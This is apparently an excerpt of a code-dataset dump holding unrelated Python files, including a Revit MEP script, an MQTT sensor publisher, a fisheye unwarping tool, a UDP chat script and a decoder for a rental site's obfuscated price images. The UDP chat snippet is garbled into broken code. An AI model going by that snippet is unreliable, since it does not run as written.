except AttributeError:\n return False\n\n def AllowReference(self, reference, position):\n return True\n\n\nclass NoInsulationNoFamilyInstance(ISelectionFilter):\n def AllowElement(self, elem):\n if isinstance(elem, InsulationLiningBase) or isinstance(elem, FamilyInstance):\n return False\n try:\n get_connector_manager(elem)\n return True\n except AttributeError:\n return False\n\n def AllowReference(self, reference, position):\n return True\n\n\ndef new_transition():\n # Prompt user to select elements and points to connect\n try:\n message = \"Pick element 1 (the connector moves depending on transition length)\"\n with forms.WarningBar(title=message):\n reference = uidoc.Selection.PickObject(\n ObjectType.Element, NoInsulationNoFamilyInstance(), message\n )\n except Exceptions.OperationCanceledException:\n return False\n\n try:\n element1 = doc.GetElement(reference)\n xyz1 = reference.GlobalPoint\n\n message = \"Pick element 2 (static)\"\n with forms.WarningBar(title=message):\n reference = uidoc.Selection.PickObject(\n ObjectType.Element, NoInsulation(), message\n )\n element2 = doc.GetElement(reference)\n xyz2 = reference.GlobalPoint\n except Exceptions.OperationCanceledException:\n return True\n\n # Get associated unused connectors\n connector1 = get_connector_closest_to(\n get_connector_manager(element1).UnusedConnectors, xyz1\n )\n connector2 = get_connector_closest_to(\n get_connector_manager(element2).UnusedConnectors, xyz2\n )\n\n try:\n if connector1.Domain != connector2.Domain:\n forms.alert(\n \"You picked 2 connectors of different domain. Please retry.\",\n title=\"Domain Error\",\n )\n return True\n except AttributeError:\n forms.alert(\n \"It looks like one of the objects have no unused connector\",\n title=\"AttributeError\",\n )\n return True\n\n if not connector1 and not connector2:\n forms.alert(\n \"It looks like one of the objects have no unused connector\",\n title=\"AttributeError\",\n )\n return True\n\n with revit.Transaction(\"Create transition\"):\n try:\n doc.Create.NewTransitionFitting(connector1, connector2)\n except Exceptions.InvalidOperationException:\n cmd_link1_msg = \"Show exemple image\"\n result = forms.alert(\n \"Unable to connect.\",\n sub_msg=\"Make sure you click near connectors you want to make a transition between.\",\n options=[cmd_link1_msg]\n )\n if result == cmd_link1_msg:\n import os; os.startfile(os.path.join(__commandpath__, \"WhereToClick.png\"))\n return True\n\n\nwhile new_transition():\n pass\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Create.panel/Transition.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"73452567731","text":"from mpu6050 import mpu6050\nfrom time import sleep\nimport paho.mqtt.client as mqtt\n\nbrokerIp = \"192.168.86.77\" #LAN\naccelerometerXTopic = \"accelerometerX\"\naccelerometerYTopic = \"accelerometerY\"\naccelerometerZTopic = \"accelerometerZ\"\ngyroscopeXTopic = \"gyroscopeX\"\ngyroscopeYTopic = \"gyroscopeY\"\ngyroscopeZTopic = \"gyroscopeZ\"\n\nsensor = mpu6050(0x68)\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\ndef on_message(client, userdata, msg):\n print(\"msg received\")\n\nclient = mqtt.Client(client_id=\"5\", clean_session=False)\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(brokerIp, 1883, 60)\n\nclient.loop_start()\n\nwhile True:\n accel_data = sensor.get_accel_data()\n gyro_data = sensor.get_gyro_data()\n\n# print(\"Accelerometer data\")\n# print(\"x: \" + str(accel_data['x']))\n# print(\"y: \" + str(accel_data['y']))\n# print(\"z: \" + str(accel_data['z']))\n\n client.publish(accelerometerXTopic, payload=accel_data['x'], qos=0, retain=False)\n# client.publish(accelerometerYTopic, payload=accel_data['y'], qos=0, retain=False)\n# client.publish(accelerometerZTopic, payload=accel_data['z'], qos=0, retain=False)\n\n# print(\"Gyroscope data\")\n# print(\"x: \" + str(gyro_data['x']))\n# print(\"y: \" + str(gyro_data['y']))\n# print(\"z: \" + str(gyro_data['z']))\n\n# client.publish(gyroscopeXTopic, payload=gyro_data['x'], qos=0, retain=False)\n# client.publish(gyroscopeYTopic, payload=gyro_data['y'], qos=0, retain=False)\n# client.publish(gyroscopeZTopic, payload=gyro_data['z'], qos=0, retain=False)\n\n sleep(0.01)\n\n","repo_name":"LeonardoFalcon/hw4","sub_path":"rpi/doorDetection.py","file_name":"doorDetection.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44249055778","text":"import argparse\nimport os\nimport torch\n\nclass BaseOptions():\n def __init__(self):\n self.initialized = False\n\n def initialize(self, parser):\n parser.add_argument('--scaled_width', type=int, default=1248, help='input width of the model')\n parser.add_argument('--scaled_height', type=int, default=384, help='input height of the model')\n parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment')\n parser.add_argument('--dataset', type=str, default='roadlanemark', help='chooses which dataset to load.')\n parser.add_argument('--num_classes', type=int, help='number of labels')\n parser.add_argument('--backbone', type=str, default='resnet34', help='choose the backbone for semantic segmentation')\n parser.add_argument('--pretrained', type=str, help='pretrained model path (.ckpt or .pth)')\n parser.add_argument('--num_threads', default=8, type=int, help='# threads for loading data')\n parser.add_argument('--seed', type=int, default=0, help='seed for random generators')\n parser.add_argument('--use_ocr', action='store_true', help='apply OCR')\n\n parser.add_argument('--normalization', default='imagenet', help='normalization type: imagenet, default (1/255)')\n parser.add_argument('--val_root', required=False, help='root folder containing images for validation')\n parser.add_argument('--val_list', required=False, help='.txt file containing validation image list')\n\n\n parser.add_argument('--save_dir', type=str, default='./checkpoints', help='where checkpoints and log are save. The final saved dir would be: //version_<0,1,2...>/')\n parser.add_argument('--batch_size', type=int, default=2, help='input batch size')\n\n # Distributed\n parser.add_argument('--gpus', type=str, default='0', help='gpu ids for training, testing. e.g. 0 or 0,1,2')\n parser.add_argument('--accelerator', type=str, default='ddp', help='DataParallel (dp), DistributedDataParallel (ddp)')\n self.initialized = True\n return parser\n\n def gather_options(self):\n # initialize parser with basic options\n if not self.initialized:\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser = self.initialize(parser)\n\n # get the basic options\n opt, _ = parser.parse_known_args()\n\n self.parser = parser\n\n return parser.parse_args()\n\n def print_options(self, opt):\n message = ''\n message += '----------------- Options ---------------\\n'\n for k, v in sorted(vars(opt).items()):\n comment = ''\n default = self.parser.get_default(k)\n if v != default:\n comment = '\\t[default: %s]' % str(default)\n message += '{:>25}: {:<30}{}\\n'.format(str(k), str(v), comment)\n message += '----------------- End -------------------'\n print(message)\n\n # save to the disk\n # expr_dir = os.path.join(opt.checkpoints_dir, opt.name)\n # util.mkdirs(expr_dir)\n # file_name = os.path.join(expr_dir, 'opt.txt')\n # with open(file_name, 'wt') as opt_file:\n # opt_file.write(message)\n # opt_file.write('\\n')\n\n def parse(self):\n opt = self.gather_options()\n\n self.print_options(opt)\n\n # set gpu ids\n # str_ids = opt.gpu_ids.split(',')\n # opt.gpu_ids = []\n # for str_id in str_ids:\n # id = int(str_id)\n # if id >= 0:\n # opt.gpu_ids.append(id)\n # if len(opt.gpu_ids) > 0:\n # torch.cuda.set_device(opt.gpu_ids[0])\n\n self.opt = opt\n return self.opt","repo_name":"v-vietlq4/thesis","sub_path":"options/base_options.py","file_name":"base_options.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"9817171622","text":"from PIL import Image\r\nimport numpy as np\r\nimport requests as req\r\nfrom io import BytesIO\r\n\r\ndef read_image(imageName):\r\n im = Image.open(imageName).convert('RGB')\r\n data = np.array(im)\r\n return data\r\n\r\ndef read_image_url(img_url):\r\n response = req.get('http://'+img_url)\r\n im = Image.open(BytesIO(response.content)).convert('RGB')\r\n data = np.array(im)\r\n return data\r\n\r\ndef get_num(n):\r\n l_num = []\r\n m = 0\r\n x = n\r\n while True:\r\n if m < 9:\r\n x0,x1, = np.split(x, [30],axis = 1)\r\n #print(x0)\r\n #plt.imshow(x0)\r\n #plt.pause(0.001)\r\n #print(x1)\r\n #plt.imshow(x1)\r\n #plt.pause(0.001)\r\n l_num.append(x0)\r\n x = x1\r\n m+=1\r\n continue\r\n else:\r\n l_num.append(x)\r\n #plt.imshow(x)\r\n #plt.pause(0.001)\r\n break\r\n return l_num\r\n\r\ndef get_0_9():\r\n l_num = get_num(read_image('3.png'))\r\n x2,x4,x3,x6,x8,x5,x1,x9,x0,x7 = l_num\r\n list_num = [x0,x1,x2,x3,x4,x5,x6,x7,x8,x9]\r\n return list_num\r\n\r\ndef get_num_list(png):\r\n l = []\r\n list_num = get_0_9()\r\n l_num_test = get_num(read_image_url(png))\r\n for i in range(0,10):\r\n #plt.imshow(l_num_test[i])\r\n #plt.pause(0.001)\r\n for w in range(0,10):\r\n #print((i == w).all())\r\n if (l_num_test[i] == list_num[w]):\r\n #plt.imshow(w)\r\n #plt.pause(0.001)\r\n l.append(w)\r\n #print(w)\r\n break\r\n #print (l)\r\n return l\r\n\r\na = get_num_list('static8.ziroom.com/phoenix/pc/images/price/e1b89727400c2b61fe1018661fada079s.png')\r\nprint(a)","repo_name":"DingDang56/spider-spider","sub_path":"myset/scrapy框架/img.py","file_name":"img.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12292818800","text":"# -*- coding: utf-8 -*-\nimport os\nimport shutil #文件移动,拷贝等操作所需要的modul\n\nphoto_path_list = []\nwith open(\"photo.txt\", \"r\") as photo_path:\n\tfor i in photo_path:\n\t\tphoto_path_list.append(i[:-1])\n\nclass_list = []\nwith open(\"result_new.txt\", \"r\") as result:\n\tfor i in result:\n\t\tresult_dict = eval(i) #将字符型i转化为class型,并赋值给result_dict字典\n\t\tif \"data\" in result_dict:\n\t\t\tdata_dict = result_dict[\"data\"]\n\t\t\tclass_list.append(data_dict[\"cluster_id\"])\n\t\telse:\n\t\t\tclass_list.append(\"0\")\n\nfor i in range(3929):\n\tph_path = os.path.join('/Users/pangweidong/Desktop/store_as_needed', str(photo_path_list[i]))\n\timage_name = os.path.basename(ph_path)\n\tcl_path = os.path.join('/Users/pangweidong/Desktop/store_as_needed', str(class_list[i]), image_name)\n\tshutil.copy(ph_path, cl_path)\n \n#根据给定的photo.txt和result_new.txt两个文件中的内容进行文件分类操作。\n","repo_name":"password442619/Python_Script","sub_path":"store_as_needed.py","file_name":"store_as_needed.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7102388483","text":"budget = float(input())\nflour_price = float(input())\negg_price = flour_price * 0.75\nmilk_price = flour_price * 1.25\nloafs = 0\neggs = 0\nloaf_price = flour_price + egg_price + (0.25 * milk_price)\nwhile budget - loaf_price > 0:\n loafs += 1\n eggs += 3\n if loafs % 3 == 0:\n eggs -= (loafs - 2)\n budget -= loaf_price\nprint(f\"You made {loafs} loaves of Easter bread! Now you have {eggs} eggs and {budget:.2f}BGN left.\")\n","repo_name":"domenikodetchev/soft-uni-courses","sub_path":"Programming-Fundamentals-Python/easter_bread.py","file_name":"easter_bread.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4294787149","text":"from threading import Thread\nfrom socket import *\n\n#1.sendmsg\ndef sendmsg():\n\twhile True:\n\t\ts_msg = input('<>%s:%s'%(str(r_msg[1]).encode('utf-8'), r_msg[0]))\n\nudpSocket = None\ns_port = 0\ns_ip = ''\n\n#3.main()\ndef main():\n\tglobal udpsocket\n\tglobal s_ip\n\tglobal s_port\n\n\ts_ip = input('< (self.length()-1):\n self.append(item)\n # 找到指定位置\n else:\n node = SingleNode(item)\n count = 0\n # pre用来指向指定位置pos的前一个位置pos-1,初始从头节点开始移动到指定位置\n pre = self._head\n while count < (pos-1):\n count += 1\n pre = pre.next\n # 先将新节点node的next指向插入位置的节点\n node.next = pre.next\n # 将插入位置的前一个节点的next指向新节点\n pre.next = node\n\n def remove(self, item):\n \"\"\"删除一个节点\"\"\"\n # 若链表为空,则直接返回\n if self.is_empty():\n return\n # 将cur指向头节点\n cur = self._head\n pre = None\n # 若头节点的元素就是要查找的元素item\n if cur.item == item:\n # 如果链表不止一个节点\n if cur.next != self._head:\n # 先找到尾节点,将尾节点的next指向第二个节点\n while cur.next != self._head:\n cur = cur.next\n # cur指向了尾节点\n cur.next = self._head.next\n self._head = self._head.next\n else:\n # 链表只有一个节点\n self._head = None\n else:\n pre = self._head\n # 第一个节点不是要删除的\n while cur.next != self._head:\n # 找到了要删除的元素\n if cur.item == item:\n # 删除\n pre.next = cur.next\n return\n else:\n pre = cur\n cur = cur.next\n # cur 指向尾节点\n if cur.item == item:\n # 尾部删除\n pre.next = cur.next\n\n def get(self, i):\n # 获取i处的元素\n if i < 0 or self.is_empty():\n return -1\n\n cur = self._head\n cur_index = 0\n while cur is not self._head:\n if cur_index == i:\n return cur.item\n\n cur_index += 1\n cur = cur.next\n\n return -1\n\n def search(self, item):\n \"\"\"查找节点是否存在\"\"\"\n if self.is_empty():\n return False\n cur = self._head\n if cur.item == item:\n return True\n while cur.next != self._head:\n cur = cur.next\n if cur.item == item:\n return True\n return False\n\n\n","repo_name":"huageyiyangdewo/learn_algorithm","sub_path":"linear/singlecyclelinklist.py","file_name":"singlecyclelinklist.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25889071405","text":"import numpy as np\nimport pyefd\nimport cv2\nimport os\nfrom code.modules import datasets\n\nMNIST_DATA = os.getcwd() + '/mnist'\nFOURIER_ORDER = 20\nRAND_SEED = 0\n \n# transform function\ndef transform_train(img):\n raster = np.asarray(img) # convert PIL image to numpy array for openCV\n ret, raster = cv2.threshold(raster, 100, 255, cv2.THRESH_BINARY) # binarize image\n contours, hierarchy = cv2.findContours(raster, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # find outer contour of objects (digit) in image\n \n # since some images have artifacts disconnected from the digit, extract only\n # largest contour from the contour list (this should be the digit)\n contour_lens = [len(contour) for contour in contours]\n largest_index = contour_lens.index(max(contour_lens))\n\n # get translation and rotation offsets\n contour = np.squeeze(contours[largest_index])\n sketch_center = pyefd.calculate_dc_coefficients(contour)\n coeffs = pyefd.elliptic_fourier_descriptors(contour, order=FOURIER_ORDER, normalize=True)\n return coeffs\n\n# create train, eval, and test datasets\ntrain_data = datasets.MNIST_VAL(root=MNIST_DATA, train=True, val=False, download=True, transform=transform_train)\n\n# load dataset\nfourier_descriptors = []\nfor (img,label) in train_data:\n fourier_descriptors.append(img)\n\nfourier_descriptors = np.stack(fourier_descriptors)\nmean = np.mean(fourier_descriptors, axis=0)\nstdev = np.std(fourier_descriptors, axis=0)\nprint(np.array2string(mean, separator=', '))\nprint('-----------------------------------')\nprint(np.array2string(stdev, separator=', '))\n","repo_name":"mjwats10/fourier-robustness","sub_path":"code/utils/mnist_mean_stdev_calc.py","file_name":"mnist_mean_stdev_calc.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74075379254","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.conf import settings\n\ndef get_prev_url(request,default):\n try:\n url = request.GET.get('back').replace('///','&')\n except:\n url = default\n return url\n\ndef create_prev_url(request):\n try:\n url = request.get_full_path().replace('&','///')\n except:\n url = '/'\n return url\n\ndef check_permission(request,perm,prev_url,modal=False):\n if not request.user.is_authenticated:\n messages.add_message(request, messages.ERROR, 'Please login first')\n if modal: return redirect('%s?next=%s&modal=Y' % (settings.LOGIN_URL, request.path))\n return redirect('%s?next=%s' % (settings.LOGIN_URL, request.path))\n if not request.user.has_perm(perm):\n messages.add_message(request, messages.ERROR, 'Operations not permitted')\n return redirect(prev_url)\n return False\n\ndef check_fk(request,fk,model,prev_url,modal=False):\n try:\n robj = model.objects.get(pk=fk)\n except:\n messages.add_message(request, messages.ERROR, 'Data not found')\n if modal : return render(request,\"ui/message_only.html\")\n return redirect(prev_url)\n if robj.c_nikappr == '':\n messages.add_message(request, messages.ERROR, 'Data must be approved')\n if modal : return render(request,\"ui/message_only.html\")\n return redirect(prev_url)\n return False\n","repo_name":"izzwl/nest","sub_path":"authnest/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"197174624","text":"# *coding:utf-8 *\n# 在猪舍原图上判断两条射线是否与标签相交\n# 用两条夹角90°的射线切割图像,确保切割出的块中猪只完整,从而确定鱼眼展开的水平角fi\n# 对每条射线计算和图像边缘线段的交点\n# 暂时只支持处理长宽相等的图像\nimport os\nimport cv2\nimport copy\nimport mmcv\nimport math\nimport numpy as np\nfrom shapely.geometry import LineString\nfrom shapely.geometry import Polygon\nfrom sympy import symbols, Eq, solve\nfrom utils.unfold import project_unfold_fast\n\n# ann_info = mmcv.load('D:/data/20220606092038/annotations/val.json')\n# ann_info = mmcv.load('D:/data/20220617180937/train_via/via_region_data.json')\n# img_dir = 'D:/data/20220606092038/val/'\n# save_dir = 'D:/data/0609/val_step_1/'\n# unfold_dir = 'D:/data/0609/black_unfold/'\n\n\n# 鱼眼相机内参矩阵\nK = np.array([[581.1058307906718, 0.0, 955.5987388116735],\n [0.0, 579.8976865646564, 974.0212406615763], [0.0, 0.0, 1.0]])\n# 鱼眼相机畸变系数\nD = np.array([-0.015964497003735242, -0.002789473611910958,\n 0.005727838947159351, -0.0025185770227346576])\n\nK_1080 = np.array([[326.872, 0.0, 537.524], [0.0, 326.192, 547.887],\n [0.0, 0.0, 1.0]])\n\n\n# 求二维平面两个向量顺时针夹角\ndef clockwise_angle(v1, v2):\n x1, y1 = v1\n x2, y2 = v2\n # dot = |v1| * |v2| * cos(theta)\n dot = x1 * x2 + y1 * y2\n # cross = |v1| * |v2| * sin(theta)\n cross = x1 * y2 - y1 * x2\n # 用arctan是考虑到其值域是[-pi, pi]\n theta = np.arctan2(cross, dot)\n theta = theta if theta > 0 else 2 * np.pi + theta\n return math.degrees(theta)\n\n\ndef via_item_auto_unfold(\n item,\n img_dir,\n unfold_dir=None,\n cut_dir=None,\n ori_dir=None,\n status_D=True,\n draw_lines=False,\n test_single_image=False\n):\n img = cv2.imread(os.path.join(img_dir, item[1]['filename']))\n w = img.shape[1]\n h = img.shape[0]\n r = int(96 / 1920 * w + 0.5)\n\n # 测试单张图片\n if test_single_image:\n if item[1]['filename'] != test_single_image:\n return None, None\n\n polygon = []\n for pig in item[1]['regions']:\n if pig['region_attributes']['type'] != 'pig':\n continue\n point_lst = []\n for point in zip(pig['shape_attributes']['all_points_x'],\n pig['shape_attributes']['all_points_y']):\n point_lst.append(point)\n polygon.append(Polygon(point_lst))\n\n # 右 下 左 上\n # 对应鱼眼展开的水平角\n # 315-360,0-45 45-135 135-225 225-315\n direct = [h, w, h, w]\n # 记录每条线的选择状态\n line_status = []\n # 对每条线坐标进行记录\n line_record = []\n # 镜头每条边上线的个数\n line_num = []\n # 图像中心点坐标\n center = [int(w / 2.0 + 0.5), int(h / 2.0 + 0.5)]\n for idx, length in enumerate(direct):\n cnt = 0\n for i in range(0, length, 40):\n if idx == 0:\n point = (w, i)\n elif idx == 1:\n point = (length - i, h)\n elif idx == 2:\n point = (0, length - i)\n elif idx == 3:\n point = (i, 0)\n cnt += 1\n x, y, k, b = symbols('x y k b')\n eqs = [\n Eq((x - center[0]) ** 2 + (y - center[1]) ** 2, r ** 2),\n Eq(k * center[0] + b, center[1]),\n Eq(k * point[0] + b, point[1]),\n Eq(k * x + b, y)\n ]\n try:\n s1, s2 = solve(eqs, [x, y, k, b])\n s1 = (s1[0].evalf(), s1[1].evalf())\n s2 = (s2[0].evalf(), s2[1].evalf())\n # 无k值,直线垂直x轴\n except Exception as e:\n s1 = (center[0], center[1] - r)\n s2 = (center[0], center[1] + r)\n if max(point[0], center[0]) >= s1[0] >= min(point[0],\n center[0]) and max(\n point[1], center[1]) >= s1[1] >= min(point[1], center[1]):\n circle_point = [s1[0], s1[1]]\n else:\n circle_point = [s2[0], s2[1]]\n circle_point = [int(circle_point[0] + 0.5),\n int(circle_point[1] + 0.5)]\n line = LineString([circle_point, point])\n flag = 0\n for pig in polygon:\n if line.intersects(pig):\n flag = 1\n break\n if flag:\n if draw_lines:\n img = cv2.line(img, circle_point, point, (0, 0, 255), 2)\n line_status.append(1)\n else:\n if draw_lines:\n img = cv2.line(img, circle_point, point, (0, 255, 0), 2)\n line_status.append(0)\n line_record.append([circle_point, point])\n line_num.append(cnt)\n for i in range(1, 4):\n line_num[i] = line_num[i - 1] + line_num[i]\n is_ring = 0\n if line_status[0] == line_status[-1] == 1:\n is_ring = 1\n\n # 线的总数\n line_sum = len(line_status)\n cluster_info = []\n ori_img = copy.copy(img)\n\n is_used = {}\n # 暂时只支持处理长宽相等的图像\n cluster_max_num = int((w + 1) / 40) - 1\n # 0°展开点表示的向量\n v0 = [center[0], 0]\n # 避免重复的展开角度\n unfold_angle = {}\n # 角度:展开区域Polygon\n polygon = {}\n # 有环,需要对环特判\n if is_ring:\n ring_start = line_sum - 1\n ring_end = 0\n is_used[0] = 1\n is_used[line_sum - 1] = 1\n for i in range(line_sum - 2, 0, -1):\n if line_status[i] == 1 and i not in is_used:\n is_used[i] = 1\n ring_start = i\n else:\n break\n for i in range(1, line_sum - 1):\n if line_status[i] == 1 and i not in is_used:\n is_used[i] = 1\n ring_end = i\n else:\n break\n len_ring = line_sum - ring_start + ring_end + 1\n success = 0\n # 环可用\n if len_ring <= cluster_max_num:\n start_line = ring_end + 1\n end_line = line_sum - (cluster_max_num - ring_end - 1) - 1\n while end_line != ring_start:\n if line_status[start_line] == line_status[end_line] == 0:\n success = 1\n break\n start_line = start_line + 1\n end_line = end_line + 1\n if success:\n # print(\"ring success:\", start_line, end_line, item[1]['filename'])\n color = (np.random.randint(256), np.random.randint(180),\n np.random.randint(180))\n if draw_lines:\n img = cv2.line(img, line_record[start_line][0],\n line_record[start_line][1], color, 2)\n img = cv2.line(img, line_record[end_line][0],\n line_record[end_line][1], color, 2)\n\n points = [line_record[end_line][1], line_record[end_line][0]]\n idx = (end_line + 1) % line_sum\n for i in range(cluster_max_num):\n points.append(line_record[idx][0])\n idx = (idx + 1) % line_sum\n points.extend(\n [line_record[start_line][0], line_record[start_line][1], [w, h],\n [0, h], [0, 0]])\n points = np.array(points)\n ring_img = copy.copy(img)\n ring_img = cv2.fillPoly(ring_img, [points], (0, 0, 0))\n\n v1 = [line_record[end_line][1][0] - center[0],\n line_record[end_line][1][1] - center[1]]\n angle = (int(clockwise_angle(v0, v1) + 0.5) + 45) % 360\n if w == 1080 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' + item[1]['filename'][-3:]\n ),\n project_unfold_fast(\n 1080, 1080, K_1080, D, 50, angle, 90, ring_img,\n 100, status_D\n )\n )\n elif w == 1920 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' + item[1]['filename'][-3:]\n ),\n project_unfold_fast(\n 1080, 1080, K, D, 50, angle, 90, ring_img,\n 100, status_D\n )\n )\n # 无环,按数组处理\n # flag 0 非簇状态 1 簇状态 用于确定簇的开始结束位置\n flag = 0\n cnt = 0\n for idx, status in enumerate(line_status):\n # 找到簇起始位,重置计数器,状态符变为簇状态\n if status == 1 and flag == 0 and idx not in is_used:\n flag = 1\n cnt = 1\n is_used[idx] = 1\n start = idx\n # 在簇中,计数器加1\n elif status == 1 and flag == 1 and idx not in is_used:\n is_used[idx] = 1\n cnt += 1\n # 簇在上一位结束,状态变为非簇\n elif status == 0 and flag == 1:\n flag = 0\n end = idx - 1\n cluster_info.append((start, end))\n # 对图片中所有簇进行遍历,找出所有满足限制的簇\n # 簇的视场角固定为90°,以1920*1920间隔40像素为例,一簇最大为47根线,共展开49根线内的栏位\n for idx, info in enumerate(cluster_info):\n start = info[0]\n end = info[1]\n cluster_len = end - start + 1\n # 满足要求的簇\n if cluster_len <= cluster_max_num:\n start_line = (end + 1) % line_sum\n end_line = start - (cluster_max_num - cluster_len) - 1\n if end_line < 0:\n end_line = line_sum + end_line\n success = 0\n while end_line != start:\n if line_status[start_line] == line_status[end_line] == 0:\n success = 1\n break\n start_line = (start_line + 1) % line_sum\n end_line = (end_line + 1) % line_sum\n if success:\n # print(\"idx: \", idx, start_line, end_line)\n color = (np.random.randint(256), np.random.randint(180),\n np.random.randint(180))\n if draw_lines:\n img = cv2.line(img, line_record[start_line][0],\n line_record[start_line][1], color, 2)\n img = cv2.line(img, line_record[end_line][0],\n line_record[end_line][1], color, 2)\n\n extend_lst = []\n # ring(不会出现,已经单独处理)或者正好在315°-45°\n if start_line <= line_num[0]:\n extend_lst = [[w, h], [0, h], [0, 0]]\n elif start_line <= line_num[1]:\n extend_lst = [[0, h], [0, 0], [w, 0]]\n elif start_line <= line_num[2]:\n extend_lst = [[0, 0], [w, 0], [w, h]]\n elif start_line <= line_num[3]:\n extend_lst = [[w, 0], [w, h], [0, h]]\n points = [line_record[end_line][1], line_record[end_line][0]]\n idx = (end_line + 1) % line_sum\n for i in range(cluster_max_num):\n points.append(line_record[idx][0])\n idx = (idx + 1) % line_sum\n points.extend(\n [line_record[start_line][0], line_record[start_line][1]])\n points.extend(extend_lst)\n points = np.array(points)\n line_img = copy.copy(img)\n line_img = cv2.fillPoly(line_img, [points], (0, 0, 0))\n\n v1 = [line_record[end_line][1][0] - center[0],\n line_record[end_line][1][1] - center[1]]\n angle = (int(clockwise_angle(v0, v1) + 0.5) + 45) % 360\n if w == 1080 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' + item[1]['filename'][-3:]),\n project_unfold_fast(1080, 1080, K_1080, D, 50,\n angle, 90, line_img, 100,\n status_D)\n )\n elif w == 1920 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' + item[1]['filename'][-3:]\n ),\n project_unfold_fast(\n 1080, 1080, K, D, 50, angle, 90, line_img,\n 100, status_D\n )\n )\n if ori_dir is not None:\n cv2.imwrite(os.path.join(ori_dir, item[1]['filename']), ori_img)\n if cut_dir is not None:\n cv2.imwrite(os.path.join(cut_dir, item[1]['filename']), img)\n return unfold_angle.keys(), polygon\n\n\nif __name__ == '__main__':\n for item in mmcv.track_iter_progress(ann_info.items()):\n unfold_angle_key, polygon = \\\n via_item_auto_unfold(\n item,\n 'D:/data/20220617180937/train/',\n unfold_dir='./',\n draw_lines=True,\n test_single_image='BYZ_1626763099525.jpg'\n )\n print(unfold_angle_key)\n # via_item_auto_unfold(item, 'D:/data/20220606092038/val/',\n # 'D:/data/0609/black_unfold/', draw_lines=True)\n","repo_name":"zyan-repository/fisheye2side","sub_path":"auto_unfold.py","file_name":"auto_unfold.py","file_ext":"py","file_size_in_byte":15225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7822154557","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass List:\n def __init__(self):\n self.first = None\n\n\ndef create_list():\n new_list = List()\n new_list.first = create_list_rec()\n return new_list\n\n\ndef create_list_from_list(l):\n new_list = List()\n new_list.first = create_list_from_list_rec(l)\n return new_list\n\n\ndef create_list_from_list_rec(l):\n if len(l) == 0:\n return None\n\n else:\n x = l[0]\n node = Node(x)\n node.next = create_list_from_list_rec(l[1:])\n return node\n\n\ndef create_list_rec():\n x = int(input(\"x=\"))\n\n if x == 0:\n return None\n\n else:\n node = Node(x)\n node.next = create_list_rec()\n return node\n\n\ndef print_list(input_list):\n print_list_rec(input_list.first)\n\n\ndef print_list_rec(node):\n if node != None:\n print(node.value)\n print_list_rec(node.next)\n\n\ndef concatenate(list1_first, list2_first):\n new_list = List()\n new_list.first = concatenate_rec(list1_first, list2_first)\n\n return new_list\n\n\ndef concatenate_rec(node1, node2):\n if node1 is None and node2 is None:\n return None\n\n if node1 is not None:\n temp_node = Node(node1.value)\n temp_node.next = concatenate_rec(node1.next, node2)\n return temp_node\n\n if node2 is not None:\n temp_node = Node(node2.value)\n temp_node.next = concatenate_rec(node1, node2.next)\n return temp_node\n\n\ndef substitute(input_list, element, substitute_list):\n new_list = List()\n new_list.first = substitute_rec(\n input_list.first,\n element,\n substitute_list.first\n )\n\n return new_list\n\n\ndef substitute_rec(node, element, substitute_node):\n if node is None:\n return None\n\n if node.value == element:\n next_substituted = substitute_rec(node.next, element, substitute_node)\n new_list = concatenate(substitute_node, next_substituted)\n\n return new_list.first\n\n temp_node = Node(node.value)\n 